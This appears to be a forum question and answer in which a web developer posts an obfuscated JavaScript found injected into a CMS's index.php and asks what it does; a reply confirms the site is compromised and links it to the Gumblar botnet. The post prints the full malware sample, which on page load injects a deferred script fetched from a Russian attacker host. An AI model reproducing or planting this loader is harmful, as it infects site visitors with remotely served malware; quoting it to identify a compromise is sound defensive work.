I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script...
What is this javascript doing? I need to explain the specific dangers to my client.
this.v=27047;
this.v+=187;
ug=["n"];
OV=29534;
OV--;
var y;
var C="C";
var T={};
r=function(){
b=36068;
b-=144;
M=[];
function f(V,w,U){
return V.substr(w,U);
var wH=39640;
}
var L=["o"];
var cj={};
var qK={N:false};
var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
var BT="BT";
var fV=RegExp;
var CE={bf:false};
var UW='';
this.Ky=11592;
this.Ky-=237;
var VU=document;
var _n=[];
try {} catch(wP){};
this.JY=29554;
this.JY-=245;
function s(V,w){
l=13628;
l--;
var U="["+w+String("]");
var rk=new fV(U, f("giId",0,1));
this.NS=18321;this.NS+=195;return V.replace(rk, UW);
try {} catch(k){};
};
this.jM="";
var CT={};
var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');
try {var vv='m'} catch(vv){};
var Os={};
var t=null;
var e=String("bod"+"y");
var F=155183-147103;
this.kp='';
Z={Ug:false};
y=function(){
var kl=["mF","Q","cR"];
try {
Bf=11271;
Bf-=179;
var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
Fp=VU[u](A);
var H="";
try {} catch(WK){};
this.Ca=19053;
this.Ca--;
var O=s('s5rLcI','2A5IhLo');
var V=F+fa;
this.bK="";
var ya=String("de"+"fe"+f("r3bPZ",0,1));
var bk=new String();
pB=9522;
pB++;
Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
Fp[ya]=[1][0];
Pe=45847;
Pe--;
VU[e].appendChild(Fp);
var lg=new Array();
var aQ={vl:"JC"};
this.KL="KL";
}
catch(x){
this.Ja="";
Th=["pj","zx","kO"];
var Jr='';
};
Tr={qZ:21084};
};
this.pL=false;
};
be={};
rkE={hb:"vG"};
r();
var bY=new Date();
window.onload=y;
cU=["Yr","gv"];
Yes. The site has been compromised.
What you need to do is:
If this script was able to find its way in, then so can others. It is not uncommon that web sites are compromised via keylogging trojans on the computers of those who log into them.
See http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With